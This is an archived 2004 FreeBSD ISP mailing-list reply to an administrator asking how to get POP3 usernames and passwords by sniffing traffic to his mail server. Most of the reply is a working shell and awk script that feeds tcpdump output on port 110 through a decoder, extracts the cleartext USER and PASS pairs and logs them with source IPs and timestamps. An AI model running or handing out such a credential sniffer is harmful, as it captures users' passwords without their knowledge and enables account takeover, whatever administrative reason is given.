From owner-freebsd-isp@FreeBSD.ORG  Tue Apr 13 13:10:57 2004
Return-Path: <owner-freebsd-isp@FreeBSD.ORG>
Delivered-To: freebsd-isp@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id DF85A16A4CE
	for <freebsd-isp@freebsd.org>; Tue, 13 Apr 2004 13:10:57 -0700 (PDT)
Received: from mail.albury.net.au (giroc.albury.NET.AU [203.15.244.13])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 6B0E443D5F
	for <freebsd-isp@freebsd.org>; Tue, 13 Apr 2004 13:10:56 -0700 (PDT)
	(envelope-from freebsd-lists@albury.net.au)
Received: from giroc.albury.net.au (giroc.albury.net.au [203.15.244.13])
	by mail.albury.net.au (8.11.1/8.11.1) with ESMTP id i3DKAo387180;
	Wed, 14 Apr 2004 06:10:50 +1000 (EST)
X-Delivered-To: freebsd-isp@freebsd.org
Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST)
From: <freebsd-lists@albury.net.au>
X-X-Sender: <rossw@giroc.albury.net.au>
To: John Fox <readbsd@mind.net>
In-Reply-To: <20040413180323.GA13554@mind.net>
Message-ID: <Pine.BSF.4.31.0404140608551.38850-100000@giroc.albury.net.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
cc: freebsd-isp@freebsd.org
Subject: Re: tcpdump for sniffing POP3 -- methods ?
X-BeenThere: freebsd-isp@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
List-Id: Internet Services Providers <freebsd-isp.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-isp>,
	<mailto:freebsd-isp-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-isp>
List-Post: <mailto:freebsd-isp@freebsd.org>
List-Help: <mailto:freebsd-isp-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-isp>,
	<mailto:freebsd-isp-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Tue, 13 Apr 2004 20:10:58 -0000


On Tue, 13 Apr 2004, John Fox wrote:

> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.

I had to do this some years back, here's the rude, crude and unattractive
script I wrote then:


# cat sniff.pop.passwords

#! /bin/sh

log=sniffed.passwords.log
mailhost="mail"				# Hostname of whichever host receives your incomming mail


tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
	BEGIN{ lut="123456789abcdef" }
	/>/ { IP=$2; n=0; len=0; c=""; }
	{
	    if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
	    if(++n>3 && len>20)
	    {
		for(i=(n==4)*4+1; i<=NF; i++)
		c=sprintf("%s%c%c",c,
			index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
			index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
		if(length(c) >= len-40)
		{
			sub("\.[0-9]*$","",IP);
			v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
			if(substr(c,1,5)=="USER ") usr[IP]=v;
			if(substr(c,1,5)=="PASS " && usr[IP])	{
				printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
				usr[IP]=""
			}
	        }
	    }
	}'